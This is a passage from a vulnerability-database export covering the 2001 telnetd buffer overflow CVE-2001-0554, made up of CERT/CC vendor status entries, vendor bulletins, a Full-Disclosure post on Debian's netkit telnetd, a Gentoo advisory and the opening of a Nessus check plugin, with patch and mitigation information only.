vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Cray __ Affected\n\nUpdated: September 07, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCray, Inc. has found UNICOS and UNICOS/mk to be vulnerable. Please see Field Notice 5062 and spr 720789 for fix information. We are currently investigating the MTA for vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Debian Affected\n\nNotified: July 24, 2001 Updated: August 20, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### FreeBSD __ Affected\n\nNotified: July 24, 2001 Updated: August 21, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll released versions of FreeBSD are vulnerable to this problem, which was fixed in FreeBSD 4.3-STABLE and FreeBSD 3.5.1-STABLE on July 23, 2001. An advisory has been released, along with a patch to correct the vulnerability and a binary upgrade package suitable for use on FreeBSD 4.3-RELEASE systems. For more information, see the advisory at the following location:\n\n<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc> \n \nor use an FTP mirror site from the following URL: \n \n<http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFreeBSD has also released <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01%3A54.ports-telnetd.asc>, a follow up advisory releated to third party implementations found in FreeBSD ports collection.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Hewlett Packard __ Affected\n\nNotified: July 24, 2001 Updated: October 19, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\\----------------------------------------------------------------\n\nHEWLETT-PACKARD COMPANY SECURITY BULLETIN: #0172 \nOriginally issued: 16 October 2001 \n\\----------------------------------------------------------------- \n \nThe information in the following Security Bulletin should be acted \nupon as soon as possible. Hewlett-Packard Company will not be \nliable for any consequences to any customer resulting from customer's \nfailure to fully implement instructions in this Security Bulletin as \nsoon as possible. \n \n\\------------------------------------------------------------------ \nPROBLEM: Systems running telnetd may permit unauthorized remote \naccess. \nSee: <http://www.cert.org/advisories/CA-2001-21.html> \n \nThis vulnerability has been assigned the identifier \nCAN-2001-0554 by the Common Vulnerabilities and Exposures \n(CVE) group: \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0554> \n \n \nPLATFORM: HP9000 Servers running HP-UX releases 10.X only. \n \nDAMAGE: An intruder can potentially execute arbitrary code \nwith the privileges of the telnetd process. \n \nSOLUTION: Apply the following patches to the release specified. \n \n10.01 PHNE_24820, \n10.10 PHNE_24820, \n10.20 PHNE_24821, \nSIS 10.20 PHNE_24822 (Telnet kerberos Patch), \n10.24 PHNE_25217. \n \nMANUAL ACTIONS: The Secure Internet Services (SIS) product, if \nenabled, has to be disabled before the installation \nor removal of PHNE_24822 (Telnet kerberos Patch). \n \nAVAILABILITY: The patches are available now from <http://itrc.hp.com>. \n \n\\------------------------------------------------------------------ \nA. Background \nA potential remotely exploitable buffer overflow in telnetd has \nbeen reported to Hewlett-Packard Company. It is unique to HP-UX \nreleases 10.X only. \n \nB. Fixing the problem \nDisable telnetd (by commenting out the /etc/inetd.conf entry for \ntelnetd and running '/usr/sbin/inetd -c') if telentd is not needed \non your system. \n \nInstall the appropriate patch from the list below. \n \nC. Recommended solution \n \nApply the following patches to the release specified. \n \n10.01 PHNE_24820, \n10.10 PHNE_24820, \n10.20 PHNE_24821, \nSIS 10.20 PHNE_24822, \n10.24 PHNE_25217. \n \nAll patches are available now from <http://itrc.hp.com>. \n \nD. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n \nUse your browser to get to the HP IT Resource Center page \nat: \n \n<http://itrc.hp.com> \n \nUse the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n \nIn the left most frame select \"Maintenance and Support\". \n \nUnder the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n \nTo -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n \nor \n \nTo -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n \nTo -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n \nFor information on the Security Patch Check tool, see: \n<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/> \ndisplayProductInfo.pl?productNumber=B6834AA\" \n \nThe security patch matrix is also available via anonymous \nftp: \n \nftp.itrc.hp.com:~ftp/export/patches/hp-ux_patch_matrix \n \nOn the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n \n \nE. To report new security vulnerabilities, send email to \n \nsecurity-alert@hp.com \n \nPlease encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com. \n \nPermission is granted for copying and circulating this \nBulletin to Hewlett-Packard (HP) customers (or the Internet \ncommunity) for the purpose of alerting them to problems, \nif and only if, the Bulletin is not edited or changed in \nany way, is attributed to HP, and provided such reproduction \nand/or distribution is performed for non-commercial purposes. \n \nAny other use of this information is prohibited. HP is not \nliable for any misuse of this information by any third party. \n_____________________________________________________________\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### IBM __ Affected\n\nNotified: July 24, 2001 Updated: August 10, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nIBM's AIX operating system, versions 5.1L and under, is vulnerable to this exploit. \n\n\nAn emergency fix (efix) is now available for downloading from the ftp site <ftp://aix.software.ibm.com/aix/efixes/security>. The efix package name to fix this vulnerability is \"telnetd_efix.tar.Z\". An advisory is included in the tarfile that gives installation instructions for the appropriate patched telnetd binary. Two patches are in the tarfile: one for AIX 4.3.3 (telnetd.433) and for AIX 5.1 (telnetd.510). \n \nIBM has these APAR assignments for this vulnerability: For AIX 4.3.3, the APAR number is IY22029. For AIX 5.1, the APAR number is IY22021.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### MiT Kerberos Development Team __ Affected\n\nUpdated: August 09, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://web.mit.edu/kerberos/www/advisories/telnetd.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \n\n\nKRB5 TELNETD BUFFER OVERFLOWS \n \n2001-07-31 \n \nSUMMARY: \n \nBuffer overflows exist in the telnet daemon included with MIT krb5. \nExploits are believed to exist for various operating systems on at \nleast the i386 architecture. \n \nIMPACT: \n \nIf telnetd is running, a remote user may gain unauthorized root \naccess. \n \nVULNERABLE DISTRIBUTIONS: \n \n* MIT Kerberos 5, all releases to date. \n \nFIXES: \n \nThe recommended approach is to apply the appropriate patches and to \nrebuild your telnetd. Patches for the krb5-1.2.2 release may be found \nat: \n \n<http://web.mit.edu/kerberos/www/advisories/telnetd_122_patch.txt> \n \nThe associated detached PGP signature is at: \n \n<http://web.mit.edu/kerberos/www/advisories/telnetd_122_patch.txt.asc> \n \nThese patches might apply successfully to older releases with some \namount of fuzz. \n \nPlease note that if you are using GNU make to build your krb5 sources, \nthe build system may attempt to rebuild the configure script from the \nchanged configure.in. This may cause trouble if you don't have \nautoconf installed properly. To prevent this, you should use the \ntouch command or some similar means to ensure that the file \nmodification time on the configure script is newer than that of the \nconfigure.in file. \n \nIf you are unable to patch your telnetd, you may should disable the \ntelnet service altogether. \n \nThis announcement and code patches related to it may be found on the \nMIT Kerberos security advisory page at: \n \n<http://web.mit.edu/kerberos/www/advisories/index.html> \n \nThe main MIT Kerberos web page is at: \n \n<http://web.mit.edu/kerberos/www/index.html> \n \nACKNOWLEDGMENTS: \n \nThanks to TESO for the original alert / Bugtraq posting. \n \nThanks to Jeffrey Altman for assistance in developing these patches. \n \nDETAILS: \n \nA buffer overflow bug was discovered in telnet daemons derived from \nBSD source code. Since the telnet daemon in MIT krb5 uses code \nlargely derived originally from BSD sources, it too is vulnerable. \n \nBy carefully constructing a series of telnet options to send to a \ntelnet server, a remote attacker may exercise a bug relating to lack \nof bounds-checking, causing an overflow of a fixed-size buffer. This \noverflow may possibly force the execution of malicious code. \n \nIt is not known how difficult this vulnerability is to exploit, since \nthe buffer is not on the stack. Some discussion seems to indicate \nthat exploits exist for this vulnerability that are believed to work \nagainst various operating systems for i386-based machines. It is not \nknown whether these existing exploits have been successfully ported to \nother processors. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 6.5.8 \n \niQCVAwUBO2cP4qbDgE/zdoE9AQEdhQQAsAxuzVwWu7pbtZ8ouNK7VAFrODGBHJ6R \nAxizbvpPMEUAPmHtNqyC+J7hmdcumAxm4ro1dQ6qqZrpV8e8X+MykNoOkt7jbzqz \nQ3KgfV8DkEthtoZ7M6asMrNScE6tBU6hfBAk33RU25vHMM42PRdRjliIDCCJl3pu \n/slqReyHFTg= \n=i6/X \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll releases of NetBSD are affected. The issue was patched in NetBSD-current on July 19th. A Security Advisory including patches will be available shortly, at:\n\n<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc> \n \nNetBSD releases since July 2000 have shipped with telnetd disabled by default. If it has been re-enabled on a system, it is highly recommended to disable it at least until patches are installed. Furthermore, NetBSD recommends the use of a Secure Shell instead of telnet for most applications.\"\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### OpenBSD Affected\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### RedHat __ Affected\n\nNotified: July 24, 2001 Updated: August 13, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <https://www.redhat.com/support/errata/RHSA-2001-100.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SGI __ Affected\n\nNotified: July 24, 2001 Updated: July 26, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSGI acknowledges the telnetd vulnerability reported by CERT and is currently investigating. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. \n\n\nAs further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list and \n \n<http://www.sgi.com/support/security/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SuSE __ Affected\n\nUpdated: October 11, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe 7.x distribution update directories contain update packages for the recently discovered in.telnetd security problem (buffer overflow). While we are working for a solution for the 6.x distribution, the available packages are ready for use. It is recommended to apply these updates as soon as possible. The packages for the 7.1 distribution are called nkitserv.rpm, for 7.2 it's called telnet-server.rpm. The packages for the 6.x distributions prove to worksome because of a much older codebase and changed behaviour of parts of the glibc. We hope to be able to provide a suitable solution soon. \nWe recommend to disable the telnet service by commenting it out from the /etc/inetd.conf file (with a following \"killall -HUP inetd\" to make inetd re-read its config file) until an update package for your distribution is available. If you do not need the telnet server service, you should leave the service disabled even if you have applied an update package to your system.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSuSE has released a security announcement related to this vulnerability. It is located at <http://www.suse.com/de/support/security/2001_029_nkitb_txt.txt>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sun __ Affected\n\nNotified: July 24, 2001 Updated: April 16, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA buffer overflow has been discovered in in.telnetd which allows a local or a remote attacker to kill the in.telnetd daemon on the affected SunOS system. Sun does not believe that this issue can be exploited on SunOS systems to gain elevated privileges. As there was a buffer overflow, Sun has generated patches for this issue. The patches are described in the following SunAlert:\n\n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F28063> \nand are available from: \n\n\n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Compaq Computer Corporation __ Not Affected\n\nNotified: July 24, 2001 Updated: August 01, 2001 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n\n\n_______________________________________________________________ \nSOURCE: Compaq Computer Corporation \nCompaq Services \nSoftware Security Response Team USA \n \nCompaq case id SSRT0745U \n \nref: potential telnetd option handling vulnerability \n \nx-ref: TESO Security Advisory 06/2001 \nCERT CA2001-21 Advisory 07/2001 \n \n \nCompaq has evaluated this vulnerability to telnetd \ndistributed for Compaq Tru64/UNIX and OpenVMS Operating \nSystems Software and has determined that telnetd is not \nvulnerable to unauthorized command execution or \nroot compromise. \n \nCompaq appreciates your cooperation and patience. \nWe regret any inconvenience applying this information \nmay cause. \n \nAs always, Compaq urges you to periodically review your system \nmanagement and security procedures. Compaq will continue to \nreview and enhance the security features of its products and work \nwith customers to maintain and improve the security and integrity \nof their systems. \n \nTo subscribe to automatically receive future NEW Security \nAdvisories from the Compaq's Software Security Response Team \nvia electronic mail, \n \nUse your browser select the URL \n<http://www.support.compaq.com/patches/mailing-list.shtml> \nSelect \"Security and Individual Notices\" for immediate dispatch \nnotifications directly to your mailbox. \n \nTo report new Security Vulnerabilities, send mail to: \nsecurity-ssrt@compaq.com \n \n(c) Copyright 2001 Compaq Computer Corporation. All rights reserved. \n \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.1 \n \niQA/AwUBO2C5JjnTu2ckvbFuEQKmqwCg/m87d9k22+qV5GY2vJAR409KFD4AoIbR \nvsQaZ9DOI4D4sj5Feg4bRZmS \n=F5Nq \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Secure Computing Corporation __ Not Affected\n\nUpdated: July 31, 2001 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe telnetd vulnerability referenced is not applicable to Sidewinder as a result of disciplined security software design practices in combination with Secure Computing's patented Type Enforcement(tm) technology. Sidewinder's telnetd services are greatly restricted due to both known and theoretical vulnerabilities. This least privilege design renders the attack described in the CERT-2001-21 Advisory useless. In addition, Sidewinder's operating system, SecureOS(tm), built on Secure's Type Enforcement technology, has further defenses against this attack that would trigger multiple security violations. \n\n\nSpecifically, the attack first attempts to start a shell process. Sidewinder's embedded Type Enforcement security rules prevent telnetd from replicating itself and accessing the system shell programs. Even without this embedded, tamper proof rule in place, other Type Enforcement rules also defend against this attack. As an example, the new shell would need administrative privileges and those privileges are not available to the telnetd services.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Data General Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Microsoft Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### NEC Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Nokia Unknown\n\nNotified: July 24, 2001 Updated: July 24, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SCO Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sequent Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sony Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Unisys Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\nView all 28 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.securityfocus.com/bid/3064>\n * <http://www.team-teso.net/advisories/teso-advisory-011.tar.gz>\n * <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc>\n\n### Acknowledgements\n\nThe CERT Coordination Center thanks TESO, who published an advisory on this issue. We would also like to thank Jeff Polk for technical assistance.\n\nThis document was written by Ian A. Finlay & Jason Rafail.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0554](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0554>) \n---|--- \n**CERT Advisory:** | [CA-2001-21 ](<http://www.cert.org/advisories/CA-2001-21.html>) \n**Severity Metric:** | 74.81 \n**Date Public:** | 2001-07-18 \n**Date First Published:** | 2001-07-24 \n**Date Last Updated: ** | 2002-04-16 19:36 UTC \n**Document Revision: ** | 42 \n", "modified": "2002-04-16T19:36:00", "published": "2001-07-24T00:00:00", "id": "VU:745371", "href": "https://www.kb.cert.org/vuls/id/745371", "type": "cert", "title": "Multiple vendor telnet daemons vulnerable to buffer overflow via crafted protocol options", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "\r\nExposure:\r\n\r\n Remote root compromise through buffer handling flaws\r\n\r\nConfirmed vulnerable:\r\n\r\n Up-to-date Debian 3.0 woody (issue is Debian-specific)\r\n Debian netkit-telnet-ssl-0.17.24+0.1 package\r\n Debian netkit-telnet-ssl-0.17.17+0.1 package\r\n\r\nMitigating factors:\r\n\r\n Telnet service must be running and accessible to the attacker.\r\n Nowadays, telnet service presence on newly deployed Linux hosts is\r\n relatively low. The service is still used for LAN access from other unix\r\n platforms, and to host various non-shell services (such as MUDs).\r\n\r\nProblem description:\r\n\r\n Netkit telnetd implementation shipped with Debian Linux appears to be\r\n lacking the AYT vulnerability patch. This patch was devised by Red Hat\r\n (?) and incorporated into Debian packages, but later dropped.\r\n\r\n This exposes the platform to a remote root problem discovered by scut of\r\n TESO back in 2001 (CVE-2001-0554), as well as to other currently\r\n unpublished flaws associated with the old buffer handling code, and\r\n elliminated by the Red Hat's overhaul of buffer handling routines.\r\n\r\n Based on a review of package changelogs, my best guess is that the patch\r\n was accidentally dropped by Christoph Martin in December 2001, but I\r\n have not researched the matter any further.\r\n\r\nVendor response:\r\n\r\n I have contacted Debian security staff on August 29, and received a\r\n confirmation of the problem from Matt Zimmerman shortly thereafter.\r\n\r\n Since this is not a new flaw, I did not plan to release my own advisory,\r\n hoping they will release a DSA bulletin and fix the problem. Three weeks\r\n have passed, however, and Debian did not indicate any clear intent to\r\n release the information any time soon. They did release nine other\r\n advisories in the meantime, some of which were of lesser importance.\r\n\r\n As such, I believe it is a good idea to bring the problem to public\r\n attention, particularly since those running telnetd were and are,\r\n unbeknownst to them, vulnerable to existing exploits.\r\n\r\nWorkaround:\r\n\r\n Disable telnet service if not needed; manually apply Red Hat\r\n netkit patches, or compile the daemon from Red Hat sources.\r\n\r\n Note that netkit as such is no longer maintained by the author, and\r\n hence obtaining the most recent source tarball (0.17) is NOT\r\n sufficient. You may also examine other less popular telnetd\r\n implementations, but be advised that almost all are heavily based on the\r\n original code, and not always up-to-date with security fixes for that\r\n codebase.\r\n\r\n\r\nPS. Express your outrage: http://eprovisia.coredump.cx.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-09-19T00:00:00", "published": "2004-09-19T00:00:00", "id": "SECURITYVULNS:DOC:6843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6843", "title": "[Full-Disclosure] Debian netkit telnetd vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2001-0554"], "edition": 1, "description": "### Background\n\nNetKit-telnetd is a standard Linux telnet client and server from the NetKit utilities. \n\n### Description\n\nA possible buffer overflow exists in the parsing of option strings by the telnet daemon, where proper bounds checking is not applied when writing to a buffer. Additionaly, another possible buffer overflow has been found by Josh Martin in the handling of the environment variable HOME. \n\n### Impact\n\nA remote attacker sending a specially-crafted options string to the telnet daemon could be able to run arbitrary code with the privileges of the user running the telnet daemon, usually root. Furthermore, an attacker could make use of an overlong HOME variable to cause a buffer overflow in the telnet client, potentially leading to the local execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll NetKit-telnetd users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-misc/netkit-telnetd-0.17-r4\"\n # emerge \">=net-misc/netkit-telnetd-0.17-r4\"", "modified": "2004-10-05T00:00:00", "published": "2004-10-05T00:00:00", "id": "GLSA-200410-03", "href": "https://security.gentoo.org/glsa/200410-03", "type": "gentoo", "title": "NetKit-telnetd: buffer overflows in telnet and telnetd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T09:44:30", "description": "The netkit-telnet daemon contained in the telnetd package version\n 0.16-4potato1, which is shipped with the 'stable' (2.2, potato)\n distribution of Debian GNU/Linux, is vulnerable to an exploitable\n overflow in its output handling.\n\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on\nhttp://online.securityfocus.com/archive/1/203000. As Debian uses the\n`telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; however, the user `telnetd' can be compromised.\n\nWe strongly advise you update your telnetd package to the versions\nlisted below.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-070-1 : netkit-telnet - remote exploit", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:netkit-telnet"], "id": "DEBIAN_DSA-070.NASL", "href": "https://www.tenable.com/plugins/nessus/14907", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-070. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14907);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n script_xref(name:\"DSA\", value:\"070\");\n\n script_name(english:\"Debian DSA-070-1 : netkit-telnet - remote exploit\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The netkit-telnet daemon contained in the telnetd package version\n 0.16-4potato1, which is shipped with the 'stable' (2.2, potato)\n distribution of Debian GNU/Linux, is vulnerable to an exploitable\n overflow in its output handling.\n\nThe original bug was found by 